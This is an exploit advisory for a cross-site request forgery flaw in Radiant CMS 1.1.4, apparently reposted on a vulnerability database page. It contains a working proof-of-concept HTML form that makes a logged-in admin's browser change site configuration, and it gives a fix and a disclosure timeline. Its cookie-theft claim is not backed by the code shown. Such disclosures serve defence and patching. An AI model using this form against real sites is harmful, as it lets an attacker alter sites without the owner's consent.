# Title : Radiant CMS v 1.1.4 - CSRF Exploit
# Author : ZwX
# Date : 16/07/2015
# Download : http://radiantcms.org/download/
# Vendor : http://radiantcms.org/
# Level Security : Medium
# Tested on : Windows 7
+----------------------+
Description & Detail
+----------------------+
An attacker could send an HTML file to make the admin him execute the file
to retrieve the login cookie or to change the title of the site ...
+----------------------+
Proof Of Concept
+----------------------+
<html>
<!-- Cross Site Request Forgery -->
<form action="http://localhost/admin/configuration" data-onsubmit_status="Saving changes…" method="post"><div style="margin:0;padding:0;display:inline">
<input class="textbox" id="site_title" name="config[site.title]" type="hidden" value="Modify site title"/>
<input class="textbox" id="site_host" name="config[site.host]" type="hidden" value="Modyfy domaine www.example.com"/>
<input class="textbox" id="dev_host" name="config[dev.host]" type="hidden" value="Hack Test"/>
<div class='buttons'>
<input class='button' type='submit' value='Save Changes'>
</form>
</html>
+----------------------+
Solution
+----------------------+
Implement a security token system
Udapte Radiant CMS
+----------------------+
Disclosure Timeline
+----------------------+
2015-07-16: Vulnerability discovered
2015-07-16: Vulnerability reported to vendor
2015-07-17: Vulnerability patched
2015-07-18: Public release of security advisory
# 0day.today [2018-01-09] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation